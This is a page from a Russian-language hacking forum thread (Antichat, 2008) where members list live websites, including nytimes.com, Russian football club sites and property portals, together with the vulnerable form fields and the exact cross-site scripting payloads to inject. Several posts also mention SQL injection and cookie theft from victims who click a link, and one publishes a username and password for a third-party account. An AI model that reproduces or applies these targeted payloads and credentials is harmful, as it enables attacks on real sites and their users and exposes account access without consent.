HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 15 из 54 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.03.2008, 13:52
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию
Цитата:
Сообщение от ЛифчиС5СВ  
www.26thavenue.com
Поковырял еще немного.

Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем
Код:
<script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
Код:
"><script>alert()</script>
Забил в гугл
Цитата:
powered by bSpeak
попробовал в нескольких местах, везде работает.

Кроме этого есть пассивные XSS в этом движке, пример -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
или в другом месте -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Horsekiller; 13.03.2008 в 14:05..
 
Ответить с цитированием

  #2  
Старый 13.03.2008, 18:23
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс
Нужно имять статут зарегенного пользователя
когда герегились постим коммент б блоге типа
Код:
<irame src=http://you.site.com/xss.html  <
ну и собстевенно создаем у себя страничку с названием xss.html
содержашую
Код:
<script>alert(/XSS/)<script>
 
Ответить с цитированием

  #3  
Старый 15.03.2008, 03:25
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
lovas.ru
вообще бараги какие то, не люблю барыг
Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом

напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>
Возможно есть и sql inj

с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost
Последний раз редактировалось xcedz; 15.03.2008 в 13:47..
 
Ответить с цитированием

  #4  
Старый 16.03.2008, 11:06
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию
bronepoezd.ru

в гостевой в поле сообщение пишем

[.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]

без точек в бб теге
 
Ответить с цитированием

  #5  
Старый 18.03.2008, 22:12
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию
file.mail.ru
narod.yandex.ru/disk/

заливаем файл со скриптом, который, при открытии файла, выполнится.
 
Ответить с цитированием

  #6  
Старый 19.03.2008, 01:54
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
domex.ru

Уязвимые поля:
Площадь (м2)
Цена


В уязвимых полях пишем: "><script>alert()</script>
 
Ответить с цитированием

  #7  
Старый 21.03.2008, 00:55
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
bloggerswap.com

Заводим акк на этом ресурсе

затем редактируем инфо Edit Account Details

в поле Website Name: добавим наш код:

">'><SCRIPT>alert(4)</SCRIPT> жмем edit my account
 
Ответить с цитированием

  #8  
Старый 23.03.2008, 18:00
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
Цитата:
Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне привет Дон \

http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25

Добавим новое сообщение

<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня

+++++++++++++++++++++++++++++++++++
Последний раз редактировалось xcedz; 23.03.2008 в 18:16..
 
Ответить с цитированием

  #9  
Старый 24.03.2008, 12:52
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
ehbsr.com
не люблю я все таки американцев
Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:
Код:
<img"""><script>alert(/ЛЯ ПА ПАМ/)</script>
 
Ответить с цитированием

  #10  
Старый 26.03.2008, 01:51
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию
Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства
В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос
В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт
В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт
Последний раз редактировалось Tigger; 26.03.2008 в 02:35..
 
Ответить с цитированием
Ответ
Страница 15 из 54 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.